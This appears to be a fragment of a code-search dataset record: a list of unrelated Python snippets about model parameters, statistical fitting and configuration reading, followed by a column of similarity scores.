np.asarray(self.model.p_outlier_allele[:, 1])\n elif name == 'negbin_hdel_mu':\n weights = self._get_hdel_weights()\n elif name == 'negbin_hdel_r_0':\n weights = self._get_hdel_weights() * np.asarray(self.model.p_outlier_total[:, 0])\n elif name == 'negbin_hdel_r_1':\n weights = self._get_hdel_weights() * np.asarray(self.model.p_outlier_total[:, 1])\n elif name == 'betabin_loh_p':\n weights = self._get_loh_weights()\n elif name == 'betabin_loh_M_0':\n weights = self._get_loh_weights() * np.asarray(self.model.p_outlier_allele[:, 0])\n elif name == 'betabin_loh_M_1':\n weights = self._get_loh_weights() * np.asarray(self.model.p_outlier_allele[:, 1])\n norm = weights.sum()\n if norm > 0.:\n return weights / norm\n else:\n print ('nothing for ' + name)\n return None", "def source_individual_params(targ_ind):\n # # Note - Table S6 lists beta1, beta2, pi1, pi2 rather than beta_T, beta_S, pi_T, pi_S.\n # # This seems to be a typo since I can reproduce their curves.\n # all_params = [[21.45e-6, 0.86, 3.68, 0.17e-7, 2.2, 10.89, 14.7, 8.21, 0.06, 4e6, 4.8e8, 1, 10, 4, 0.001],\n 
# [1.31e-6, 1.82, 15.53, 0.8e-7, 2.18, 2.46, 15, 8.44, 0.18, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [13.35e-6, 1.16, 11.61, 2.63e-7, 4.17, 1.67, 6.5, 7.92, 0, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [2.4e-6, 3.55, 11.53, 1.35e-7, 1.6, 1.7, 15.7, 10.99, 2.4, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [1.41e-6, 1.42, 12.47, 1.06e-7, 2.17, 1.08, 22, 8.21, 0, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [6.94e-6, 0.76, 5.89, 0.17e-7, 3.33, 10.34, 17.3, 8.79, 0.15, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [18.21e-6, 0.38, 8.74, 9.19e-7, 0.41, 0.15, 17.85, 9, 0.22, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [5.12e-6, 3.53, 4.5, 4.9e-7, 2.04, 1.64, 8.3, 6.89, 1.89, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # [1.53e-6, 4.06, 9.65, 0.29e-7, 3.96, 8.15, 17.11, 9.47, 0.66, 4e6, 4.8e8, 1, 10, 4, 0.001],\n # ]\n\n # I've modified it so that I10 is instead VT0, the initial (swabbable) virions from the URT.\n all_params = [[21.45e-6, 0.86, 3.68, 0.17e-7, 2.2, 10.89, 14.7, 8.21, 0.06, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [1.31e-6, 1.82, 15.53, 0.8e-7, 2.18, 2.46, 15, 8.44, 0.18, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [13.35e-6, 1.16, 11.61, 2.63e-7, 4.17, 1.67, 6.5, 7.92, 0, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [2.4e-6, 3.55, 11.53, 1.35e-7, 1.6, 1.7, 15.7, 10.99, 2.4, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [1.41e-6, 1.42, 12.47, 1.06e-7, 2.17, 1.08, 22, 8.21, 0, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [6.94e-6, 0.76, 5.89, 0.17e-7, 3.33, 10.34, 17.3, 8.79, 0.15, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [18.21e-6, 0.38, 8.74, 9.19e-7, 0.41, 0.15, 17.85, 9, 0.22, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [5.12e-6, 3.53, 4.5, 4.9e-7, 2.04, 1.64, 8.3, 6.89, 1.89, 4e6, 4.8e8, 1, 10, 4, 0.001],\n [1.53e-6, 4.06, 9.65, 0.29e-7, 3.96, 8.15, 17.11, 9.47, 0.66, 4e6, 4.8e8, 1, 10, 4, 0.001],\n ]\n currparam = all_params[targ_ind]\n return currparam", "def _param(self) ->nn.Parameter:\n return next(self.parameters())", "def get_trial_param(self, trial_id: int, param_name: str) -> float:\n raise NotImplementedError", "def _get_R(self, net_r_amp):\n return np.abs(net_r_amp)**2", "def GetParameters_and_Weight_of_CalSensor(ind, similar_sensors): \n v, a, h = similar_sensors.loc[ind]['Vert_Shift'], similar_sensors.loc[ind]['Amplitude'], similar_sensors.loc[ind]['Horiz_Shift']\n por, res, drain = similar_sensors.loc[ind]['Porosity'], similar_sensors.loc[ind]['Res_SM'], similar_sensors.loc[ind]['Drainage']\n n, w = similar_sensors.loc[ind]['n'], similar_sensors.loc[ind]['Weight']\n return v,a,h,por,res,drain,n,w", "def get_initial_params(self, x, y, yerr):\n ampl = y[0]\n offset = 0\n tau = log(y[-1] / float(y[0])) / (x[-1] - x[0])\n if self.amplitude != None:\n p0 = array([tau])\n else:\n if self.offset:\n p0 = array([tau, ampl, offset])\n else:\n p0 = array([tau, ampl])\n return p0", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Afb[0.6,-0.75,0.75]\");\n self.modelBuilder.doSet(\"POI\",\"Afb\")\n\n # ss templates\n self.modelBuilder.doVar(\"Dilu_ratio[1.0,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rdy_mumu_ss[1.0,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rdy_ee_ss[1.0,0.0,10.0]\");\n \n self.modelBuilder.factory_('expr::Rpl(\"0.5*(1.+@0*@1)\",Afb, Dilu_ratio)')\n self.modelBuilder.factory_('expr::Rmn(\"0.5*(1.-@0*@1)\",Afb, Dilu_ratio)')", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def getOptimalParams(self):\n\t\t# Load calibration chain and find optimal for like1\n\t\tcal_data = 
pd.read_csv(self.database_path, sep=',')\n\t\tparams = cal_data.ix[cal_data['like1'].idxmax()].to_dict()\n\t\tcost = params['like1']\n\t\t# reformat parameters to match original naming\n\t\tparams_reformatted = {}\n\t\tfor k, p in self.cal_params.items():\n\t\t\tparams_reformatted[k] = params['par'+k]\n\n\t\treturn params_reformatted, cost", "def _get_params(self):\r\n return np.hstack((self.variance, self.lengthscale))", "def _get_params(self):\r\n return np.hstack((self.variance, self.lengthscale))", "def enforce(self, wave, variables, parameters):\n return np.hstack([variables[0] - self.level])", "def getExtrinsicParameter(K, R, C):\n t = np.dot(-R, C)\n homogeneous_matrix = np.hstack((R.reshape(3, 3), t))\n extrinsic_parameter = np.dot(K, homogeneous_matrix)\n return extrinsic_parameter", "def _get_params(self):\r\n return np.hstack((self.variance,self.lengthscale))", "def scale_parameter(self):\n return self._scale_parameter", "def parameters(self):\n #print \"in instrument.parameter()\"\n return self._params", "def get_explanatory_variable(self):\n\n return self._explanatory_variables[0]", "def sample_rate(self):\n\n properties_file = open(self.scenario_path + \"/conf/sandag_abm.properties\", \"r\")\n rate = None\n\n for line in properties_file:\n # strip all white space from the line\n line = line.replace(\" \", \"\")\n\n # find line containing \"sample_rates=\"\n m = re.compile(\"sample_rates=\").match(line)\n if m:\n # take the portion of the line after the matching string\n # and split by the comma character\n line = line[m.end():].split(\",\")\n\n # if the split line contains a single element return that element\n # otherwise return the final element\n if len(line) == 0:\n rate = float(line[0])\n else:\n rate = float(line[-1])\n break\n\n properties_file.close()\n\n return rate", "def __adjust(self, *args):\n return \"adjust\"", "def derive_sample_params(self, global_state):\n return global_state.l2_norm_clip", "def getParameter(self, *args):\n return _libsbml.Model_getParameter(self, *args)", "def get_scale_parameter(self):\r\n \r\n if self.scale_parameter == 0.0: \r\n shape_in_gamma_func = float(1+(1/self.shape_parameter))\r\n gamma_func = special.gamma(shape_in_gamma_func)\r\n self.scale_parameter = (self.mean_fire_recurrence/gamma_func)\r\n return self.scale_parameter\r\n else:\r\n return self.scale_parameter", "def rate_parameters(self):\n rate_parameters = deepcopy(self.__likelihood.rate_parameters)\n for k in self.__likelihood.rate_parameters.keys():\n if k+\"_rate_multiplier\" in self.conv_config.keys():\n rate_parameters.pop(k)\n\n return rate_parameters", "def adjustment(self, uuid):\r\n return ads.Adjustment(self, uuid)", "def IMPORTANCE(attribute_name, examples, attribues):\n p = 0\n n = 0\n # First count the number of p and n \n for item in examples:\n if item[-1] == 'Yes':\n p += 1\n else:\n n += 1\n Gain = B(p/(p+n)) - REMAINDER(attribute_name, examples, attribues)\n return Gain" ]
[ "0.5970573", "0.5970573", "0.5970573", "0.5970573", "0.5970573", "0.5970573", "0.5970573", "0.5970573", "0.55451614", "0.5458691", "0.5382217", "0.5338391", "0.52984136", "0.52497977", "0.5241062", "0.5241062", "0.52158433", "0.5213984", "0.5213984", "0.5159911", "0.5122732", "0.5122732", "0.5092428", "0.5075391", "0.5052946", "0.50310373", "0.5022099", "0.4997139", "0.4979453", "0.49286848", "0.4923194", "0.4917466", "0.4879428", "0.48773882", "0.4877344", "0.48759872", "0.4860874", "0.48564583", "0.4838914", "0.48351783", "0.47919795", "0.47909272", "0.4782862", "0.47802216", "0.4779709", "0.47787923", "0.47779015", "0.4774232", "0.47591195", "0.47587603", "0.47474337", "0.47222978", "0.470817", "0.4703813", "0.4703429", "0.47000802", "0.4696898", "0.46930638", "0.46913144", "0.46908298", "0.4670111", "0.4657506", "0.46547753", "0.46523997", "0.4650519", "0.46489963", "0.46489963", "0.46489963", "0.46449575", "0.46387222", "0.46289894", "0.46279934", "0.46220833", "0.46219155", "0.4619741", "0.46180573", "0.46116686", "0.46084893", "0.46021453", "0.46018842", "0.4596365", "0.4590685", "0.4590685", "0.4590685", "0.45902565", "0.45868343", "0.45868343", "0.45809925", "0.45785442", "0.457706", "0.45687914", "0.45668912", "0.456689", "0.45603427", "0.45539755", "0.45503983", "0.4549359", "0.45452315", "0.45392174", "0.4537734", "0.45306924" ]
0.0
-1
Get all combinations of items in the given array. Specifically used for generating variant combinations.
def get_all_comb(array, r=None):
    if r is None:
        r = len(array)
    return [_ for i in range(1, r + 1) for _ in itertools.combinations(array, i)]
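For illustration, a minimal, self-contained usage sketch of the helper above. The itertools import and the sample option values are added here for demonstration and are not part of the dataset row; the function body itself is unchanged.

import itertools

def get_all_comb(array, r=None):
    # Collect combinations of every length from 1 up to r (defaults to len(array)).
    if r is None:
        r = len(array)
    return [_ for i in range(1, r + 1) for _ in itertools.combinations(array, i)]

# Example: three option values yield every non-empty variant combination.
print(get_all_comb(["red", "large", "cotton"]))
# [('red',), ('large',), ('cotton',), ('red', 'large'), ('red', 'cotton'),
#  ('large', 'cotton'), ('red', 'large', 'cotton')]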
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def combinations(arrays):\n return np.array(np.meshgrid(*arrays)).T.reshape(-1, len(arrays))", "def combos(array,n=2): \n # base case\n if n==0:\n yield frozenset()\n return\n\n # core recursion\n for c in set(combos(array,n-1)):\n for i in array:\n #added this to avoid duplicate combos\n if i not in c:\n # add element i to combo c\n yield frozenset({i})| c", "def AllCombinations(data, comblength):\n return [c for c in itertools.combinations(data, comblength)]", "def subsets(arr):\n return chain(*[combinations(arr, i + 1) for i, a in enumerate(arr)])", "def subsets(arr):\n return chain(*[combinations(arr, i + 1) for i, a in enumerate(arr)])", "def get_combinations(self):\n all_steps = self.do_steps()\n self.option = [k for k, v in all_steps.items()]\n result = itertools.product(*(v for k, v in all_steps.items()))\n return result", "def __get_all_combinations(self, list_of_items):\r\n return [itertools.combinations(list_of_items, index+1)\r\n for index in range(len(list_of_items))]", "def combinations(*comb, **kw):\n return _fixture_functions.combinations(*comb, **kw)", "def cartesian_product(arrays):\n la = len(arrays)\n dtype = np.find_common_type([a.dtype for a in arrays], [])\n arr = np.empty([len(a) for a in arrays] + [la], dtype=dtype)\n for i, a in enumerate(np.ix_(*arrays)):\n arr[..., i] = a\n return arr.reshape(-1, la)", "def generate_option_combos(self):\n available_options = list()\n for option in self.options:\n # generate a list of dicts for every value of the option\n tmp = list()\n for value in option.values:\n tmp.append({option.name: value})\n\n available_options.append(tmp)\n\n # generate a list of tuples for each product option combination\n option_combos = list(itertools.product(*available_options))\n\n return option_combos", "def cartesian_product(*arrays):\n\n la = len(arrays)\n if la == 0:\n return np.array([])\n dtype = np.result_type(*arrays)\n arr = np.empty([len(a) for a in arrays] + [la], dtype=dtype)\n for i, a in enumerate(np.ix_(*arrays)):\n arr[..., i] = a\n return arr.reshape(-1, la)", "def combinations(*args: List[Any]) -> List[List]:\n return list([list(el) for el in list(product(*args))])", "def combinations(self):\n return self._combinations", "def cartesian_product(*arrays):\n length = len(arrays)\n dtype = np.result_type(*arrays)\n arr = np.empty([len(a) for a in arrays] + [length], dtype=dtype)\n for idx, array in enumerate(np.ix_(*arrays)):\n arr[...,idx] = array\n return arr.reshape(-1, length)", "def make_combinations(items):\n\n def inner(items, r):\n \"\"\"\n recursively yields partitioned remainders of original partition lists\n \"\"\"\n items = set(items)\n if not len(items):\n yield ()\n return\n first = next(iter(items))\n remainder = items.difference((first, ))\n for combination in combinations(remainder, r-1):\n first_subset = (first, ) + combination\n for partition in inner(remainder.difference(combination), r):\n yield (first_subset, ) + partition\n\n def outter(items, r):\n \"\"\"\n combines partition lists\n \"\"\"\n items = set(items)\n for i in range(len(items), -1, -r):\n if i == 0:\n for partition in inner(items, r):\n yield partition\n elif i != r:\n for combination in combinations(items, i):\n for partition in inner(items.difference(combination), r):\n yield partition + (combination, )\n\n # step through length of origin combination partitions to ensure full list\n for i in range(1, len(items)):\n gen = outter(items, i)\n for row in gen:\n yield row", "def equipment_combinations(weapons, armor, rings):\n weapon_choices = 
item_combinations(weapons, range(1, 2))\n armor_choices = item_combinations(armor, range(2))\n ring_choices = item_combinations(rings, range(3))\n complete_choices = itertools.product(weapon_choices, armor_choices, ring_choices)\n return complete_choices", "def _combinations(n_features, n_args, interaction_only):\n comb = combinations if interaction_only else combinations_w_r\n return comb(range(n_features), n_args)", "def cartesian(arrays, out=None):\n\n arrays = [np.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = np.prod([x.size for x in arrays])\n if out is None:\n out = np.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:, 0] = np.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m, 1:])\n for j in range(1, arrays[0].size):\n out[j*m:(j+1)*m, 1:] = out[0:m, 1:]\n return out", "def _generate_combinations(self, param_idx, params):\n\n if param_idx == len(self.grid) - 1:\n # last parameter, just return list of values for this parameter\n return [[value] for value in self.grid[params[param_idx]]]\n else:\n subcombinations = self._generate_combinations(param_idx + 1, params) # returns list of param combinations\n result = []\n\n # iterate over all values of current parameter\n for value in self.grid[params[param_idx]]:\n for subcombination in subcombinations:\n result.append([value] + subcombination)\n\n return result", "def cartesian(arrays, out=None):\n\n arrays = [np.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = np.prod([x.size for x in arrays])\n if out is None:\n out = np.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:, 0] = np.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m, 1:])\n for j in range(1, arrays[0].size):\n out[j * m:(j + 1) * m, 1:] = out[0:m, 1:]\n return out", "def cartesian(arrays, out=None):\n\n arrays = [np.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = np.prod([x.size for x in arrays])\n if out is None:\n out = np.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:,0] = np.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m,1:])\n for j in xrange(1, arrays[0].size):\n out[j*m:(j+1)*m,1:] = out[0:m,1:]\n return out", "def cartesian(arrays, out=None):\n\n arrays = [np.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = np.prod([x.size for x in arrays])\n if out is None:\n out = np.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:,0] = np.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m,1:])\n for j in xrange(1, arrays[0].size):\n out[j*m:(j+1)*m,1:] = out[0:m,1:]\n return out", "def genSubset2(L):\n import itertools\n result = []\n for i in range(len(L) + 1):\n result += list(itertools.combinations(L, i))\n return result", "def cartesian(arrays, out=None):\n\n arrays = [numpy.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = numpy.prod([x.size for x in arrays])\n if out is None:\n out = numpy.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:, 0] = numpy.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m, 1:])\n for j in xrange(1, arrays[0].size):\n out[j * m:(j + 1) * m, 1:] = out[0:m, 1:]\n return out", "def compute_combinations(items: List[Union[List[Any], Tuple]], n: int) -> List[List[Any]]:\n return [chunks[i:i + n] for chunks in items for i in range(len(chunks) - (n - 1))]", "def cartesian(arrays, out=None):\n\n arrays = [numpy.asarray(x) for x in arrays]\n dtype = 
arrays[0].dtype\n\n n = numpy.prod([x.size for x in arrays])\n if out is None:\n out = numpy.zeros([n, len(arrays)], dtype=dtype)\n\n m = n / arrays[0].size\n out[:,0] = numpy.repeat(arrays[0], m)\n if arrays[1:]:\n cartesian(arrays[1:], out=out[0:m,1:])\n for j in xrange(1, arrays[0].size):\n out[j*m:(j+1)*m,1:] = out[0:m,1:]\n return out", "def subset_gen(itemSet):\n subsets = []\n for i in range(1, len(itemSet)):\n c = combinations(itemSet, r=i)\n for cc in c:\n subsets.append(set(cc))\n return subsets", "def generate_item_combinations(\n weapons, armors, rings\n) -> Iterator[Tuple[Item, Item, Item, Item]]:\n\n for weapon in weapons:\n for armor in armors:\n for ring_one, ring_two in combinations(rings, 2):\n yield weapon, armor, ring_one, ring_two", "def permutations(xs):\n if not xs:\n yield []\n else:\n for x, xs in selections(xs):\n for ys in permutations(xs):\n yield [x] + ys", "def get_paren_combos():\n results = [None] * 4\n options = [('%s', '(%s)')]\n for i in range(1, 4):\n results[i] = list(itertools.product(*(i * options)))\n return results", "def powerset(iterable):\n s = list(iterable)\n return itertools.chain.from_iterable( itertools.combinations(s, r)\n for r in range(len(s)+1) )", "def iter_combos(include_unknown=False):\n if include_unknown:\n return _combos\n else:\n return _combos[:-7]", "def CombinationMethods(nums, elements_number):\n res = list(c(nums, elements_number))\n return res, Combination(len(nums), elements_number)", "def myCombinations(iterable, r):\n for perm in itertools.permutations(iterable, r):\n if sorted(perm) == list(perm):\n yield perm", "def swp_combo_iter(self) -> Iterable[Tuple[Any, ...]]:\n return itertools.product(*(self._sweep_params[var] for var in self._swp_var_list))", "def sets(elements, set_size):\n return combinations(elements, set_size)", "def combinations(sequence, length, NULL=object()):\r\n if length <= 0:\r\n combos = [NULL]\r\n else:\r\n combos = []\r\n for i, item in enumerate(sequence, 1):\r\n rem_items = sequence[i:]\r\n rem_combos = combinations(rem_items, length-1)\r\n combos.extend(item if combo is NULL else [item, combo]\r\n for combo in rem_combos)\r\n return combos", "def cands(inputs):\n # The below could probably be simplified a bit....\n return map(''.join, list(itertools.chain.from_iterable([ map (list, (itertools.permutations(inputs, x))) for x in range(4, len(inputs)+1)])))", "def cartesian_product(input_sets, elem_size=1):\n import itertools\n out = []\n # ::-1 reverse order to be backwards compatiable with old\n # function below\n for r in itertools.product(*input_sets[::-1]):\n out.append(r)\n out = np.asarray(out).T[::-1, :]\n return out\n\n # try:\n # from pyapprox.cython.utilities import cartesian_product_pyx\n # # # fused type does not work for np.in32, np.float32, np.int64\n # # # so envoke cython cast\n # # if np.issubdtype(input_sets[0][0],np.signedinteger):\n # # return cartesian_product_pyx(input_sets,1,elem_size)\n # # if np.issubdtype(input_sets[0][0],np.floating):\n # # return cartesian_product_pyx(input_sets,1.,elem_size)\n # # else:\n # # return cartesian_product_pyx(\n # # input_sets,input_sets[0][0],elem_size)\n # # always convert to float then cast back\n # cast_input_sets = [np.asarray(s, dtype=float) for s in input_sets]\n # out = cartesian_product_pyx(cast_input_sets, 1., elem_size)\n # out = np.asarray(out, dtype=input_sets[0].dtype)\n # return out\n # except:\n # print('cartesian_product extension failed')\n\n # num_elems = 1\n # num_sets = len(input_sets)\n # sizes = np.empty((num_sets), 
dtype=int)\n # for ii in range(num_sets):\n # sizes[ii] = input_sets[ii].shape[0]/elem_size\n # num_elems *= sizes[ii]\n # # try:\n # # from pyapprox.weave import c_cartesian_product\n # # # note c_cartesian_product takes_num_elems as last arg and cython\n # # # takes elem_size\n # # return c_cartesian_product(input_sets, elem_size, sizes, num_elems)\n # # except:\n # # print ('cartesian_product extension failed')\n\n # result = np.empty(\n # (num_sets*elem_size, num_elems), dtype=type(input_sets[0][0]))\n # for ii in range(num_elems):\n # multi_index = ind2sub(sizes, ii, num_elems)\n # for jj in range(num_sets):\n # for kk in range(elem_size):\n # result[jj*elem_size+kk, ii] =\\\n # input_sets[jj][multi_index[jj]*elem_size+kk]\n # return result", "def cartesian(arrays, dtype=np.float32):\n la = len(arrays)\n arr = np.empty([len(a) for a in arrays] + [la], dtype=dtype)\n for i, a in enumerate(np.ix_(*arrays)):\n arr[...,i] = a\n return arr.reshape(-1, la)", "def tc_gen(n):\r\n comb = (list(tuple) for tuple in itertools.product([True,False], repeat=n))\r\n return list(comb)", "def _product(self, args):\n pools = map(tuple, args) #within original version args defined as *args\n result = [[]]\n for pool in pools:\n result = [x + [y] for x in result for y in pool]\n return result", "def powerset(xs):\n cards = list(reversed(xrange(len(xs)))) + [len(xs)]\n return list(chain.from_iterable(combinations(xs, n) for n in cards))", "def combinations_from_options(self):\n combs = []\n Nmetals = self.options.metal_sbu_per_structure\n for combo in self.options.sbu_combinations:\n # first sbus have to be metals.\n met = []\n for i in range(Nmetals):\n met.append(self.sbus.get(combo[i], _METAL=True))\n combs.append(tuple(met + [self.sbus.get(i) for i in combo[Nmetals:]]))\n return combs", "def powerset(iterable):\n\n s = list(iterable)\n\n return chain.from_iterable(combinations(s, r) for r in range(2, len(s) + 1))", "def __combination(orgset, k):\n if k == 1:\n for i in orgset:\n yield (i,)\n elif k > 1:\n for i, x in enumerate(orgset):\n # iterates though to near the end\n for s in __combination(orgset[i + 1 :], k - 1):\n yield (x,) + s", "def pair_combos(iterable):\n pairs = set()\n for a in iterable:\n for b in iterable:\n pairs.add(a + b)\n return list(pairs)", "def cartesian(arrays, out=None):\n arrays = [np.asarray(x) for x in arrays]\n shape = (len(x) for x in arrays)\n dtype = arrays[0].dtype\n\n ix = np.indices(shape)\n ix = ix.reshape(len(arrays), -1).T\n\n if out is None:\n out = np.empty_like(ix, dtype=dtype)\n\n for n, arr in enumerate(arrays):\n out[:, n] = arrays[n][ix[:, n]]\n\n return out", "def cartesian(arrays, out=None):\n arrays = [np.asarray(x) for x in arrays]\n shape = (len(x) for x in arrays)\n dtype = arrays[0].dtype\n\n ix = np.indices(shape)\n ix = ix.reshape(len(arrays), -1).T\n\n if out is None:\n out = np.empty_like(ix, dtype=dtype)\n\n for n, arr in enumerate(arrays):\n out[:, n] = arrays[n][ix[:, n]]\n\n return out", "def get_combinations(text):\n combinations = []\n arr = []\n slen = len(text)\n __find_factor(slen,slen,combinations,arr)\n \n elements = []\n for comb in combinations:\n tmp = [0] + comb\n elements.append([text[tmp[i]:tmp[i]+tmp[i+1]] for i in range(len(tmp)-1)])\n return elements", "def get_all_combinations(self):\n stuffs = map(lambda row: row.split(\" \"), self.expanded['GS'] )\n\n combs = self.all_combinations(stuffs)\n\n cls_repeated = self.expanded['CLS'].reset_index(drop=True)[np.array(combs[0])]\n\n A = cls_repeated.reset_index(drop=True)\n B = 
pd.Series(combs[1])\n\n combo_table = pd.DataFrame([A, B]).T\n\n combo_table.columns = ['CLS','GSCMB']\n\n df = combo_table\n\n df['srt'] = [ ' '.join(map(str, g)) for g in df[\"GSCMB\"] ]\n keep_idx = df[[0,2]].drop_duplicates().index\n gewd = df.iloc[keep_idx,:].reset_index(drop=True)[[\"CLS\",\"GSCMB\"]]\n\n combo_table = gewd\n\n combo_dict = combo_table.groupby('CLS')['GSCMB'].apply(lambda x: x.tolist())\n return combo_dict", "def generate_true_combinations(data):\n true_combinations = []\n for group in data:\n for i in range(len(group)):\n for j in range(i, len(group)):\n true_combinations.append((group[i], group[j], 1))\n return true_combinations", "def powerset(iterable):\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))", "def powerset(iterable):\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))", "def powerset(iterable):\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))", "def powerset(iterable):\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(1, len(s)+1))", "def cartesianproduct(lists):\r\n return reduce(appendEs2Sequences,lists,[])", "def _get_argument_combinations(arguments):\n arg_names = sorted(arguments)\n combinations = itertools.product(*(arguments[arg] for arg in arg_names))\n combinations = [dict(zip(arg_names, arg_values)) for arg_values in combinations]\n return combinations", "def powerset(iterable):\n\n \"powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)\"\n s = list(iterable)\n return itertools.chain.from_iterable(\n itertools.combinations(s, r) for r in range(1, len(s) + 1)\n )", "def powerset(iterable):\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(2, len(s)+1))", "def get_pairs(terms):\n return itertools.combinations(terms, 2)", "def generateCombos(vars,constants):\n # SUPER NOT GENERALIZED---TOO LATE AT NIGHT FOR ME TO DO RECURSIVE ALGORITHMS\n assert len(vars) == 2 and len(constants) == 2\n combs = []\n for c1 in constants:\n for c2 in constants:\n combs.append(Grounding([(vars[0], c1), (vars[1], c2)]))\n return combs", "def allcombinations(orgset, k):\n return itertools.chain(*[combination(orgset, i) for i in range(1, k + 1)])", "def _powerset(iterable: Iterable) -> Iterator:\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))", "def tripletGenerator(S):\n for a in S:\n for b in S:\n for c in S:\n yield (a, b, c)", "def all_subsets(self, ss):\n return chain(*map(lambda x: combinations(ss, x), range(1, len(ss)+1)))", "def section_4_9():\n from itertools import permutations\n from itertools import combinations\n from itertools import combinations_with_replacement\n\n items = ['a', 'b', 'c']\n\n def test1():\n for p in permutations(items):\n print(p)\n\n def test2():\n for p in combinations(items, 3):\n print(p)\n print()\n for p in combinations(items, 2):\n print(p)\n print()\n for p in combinations(items, 1):\n print(p)\n print()\n for p in combinations_with_replacement(items, 3):\n print(p)", "def __iter__(self):\n return iproduct(*self.sets)", "def expand_grid(param_dict):\n return list(itertools.product(*param_dict.values()))", "def part_1():\n return itertools.permutations(range(5))", "def generate_new_combinations(old_combinations):\r\n\r\n items_types_in_previous_step = np.unique(old_combinations.flatten())\r\n for old_combination in old_combinations:\r\n max_combination = 
max(old_combination)\r\n for item in items_types_in_previous_step:\r\n if item > max_combination:\r\n res = tuple(old_combination) + (item,)\r\n yield res", "def _cartesian(arrays):\n arrays = [np.asarray(x) for x in arrays]\n shape = (len(x) for x in arrays)\n\n ix = np.indices(shape)\n ix = ix.reshape(len(arrays), -1).T\n\n out = pd.DataFrame()\n\n for n, arr in enumerate(arrays):\n out[n] = arrays[n][ix[:, n]]\n\n return out", "def item_combinations(items, combo_range):\n if combo_range.start < 0 or combo_range.stop < 0:\n raise ValueError(\"Range must not be negative\")\n elif (\n combo_range.start == combo_range.stop\n or combo_range.start == 0\n and combo_range.stop == 1\n ):\n # Choices are of length zero\n return []\n\n full_length_combos = []\n if combo_range.start == 0:\n no_choice = [None for _ in range(combo_range.stop - 1)]\n full_length_combos.append(tuple(no_choice))\n combo_range = range(1, combo_range.stop)\n\n expected_length = combo_range.stop - 1\n for length in combo_range:\n combos = itertools.combinations(items, length)\n if length < expected_length:\n combos = [c + tuple([None] * (expected_length - length)) for c in combos]\n full_length_combos.extend(combos)\n\n return full_length_combos", "def combination_util(arr, n, r, index, data, i):\n if index == r:\n for j in range(r):\n print(data[j], end=\" \")\n print(\" \")\n return\n # When no more elements are there to put in data[]\n if i >= n:\n return\n # current is included, put next at next location\n data[index] = arr[i]\n combination_util(arr, n, r, index + 1, data, i + 1)\n # current is excluded, replace it with\n # next (Note that i+1 is passed, but\n # index is not changed)\n combination_util(arr, n, r, index, data, i + 1)\n # The main function that prints all combinations\n # of size r in arr[] of size n. 
This function\n # mainly uses combinationUtil()", "def get_all_combinations(param_opt):\n\tif not param_opt:\n\t\treturn {}\n\treturn (dict(zip(param_opt.keys(), x)) for x in itertools.product(*param_opt.values()))", "def corner_combinations(zdim: int):\n return combinations(range(zdim), 2)", "def powerset(iterable):\n\tset_list = list(iterable)\n\treturn list(chain.from_iterable(combinations(set_list, r)\n\t\t\t\t\t\t\t\tfor r in range(len(set_list)+1)))", "def gen_input_permutation():\n return [(arch, src, dst) for arch in architecture.ARCH_ACCEPTED for src in PRODUCT_TYPE for dst in PRODUCT_TYPE]", "def comb(set, n):\n if len(set) < n:\n raise Exception(\"Not enough elements\")\n elif len(set) == n:\n yield set\n else:\n setLen = len(set)\n iters = [rangeIter(setLen - n + 1)]\n values = [0] * n\n values[0] = iters[0].next()\n level = 1\n while True:\n # Fill array of iterators back up\n while level < n:\n iters.append(rangeIter(values[level - 1] + 1,\n setLen - n + level + 1))\n values[level]=iters[level].next()\n level += 1\n subset = [set[i] for i in values]\n yield subset\n while True:\n try:\n values[level - 1] = iters[level - 1].next()\n break\n except StopIteration:\n iters.pop()\n level -= 1\n if level == 0:\n # Top-level iterator is done, so we are too\n raise StopIteration", "def part_2():\n return itertools.permutations(range(5, 10))", "def combinations(iterable, r):\n pool = 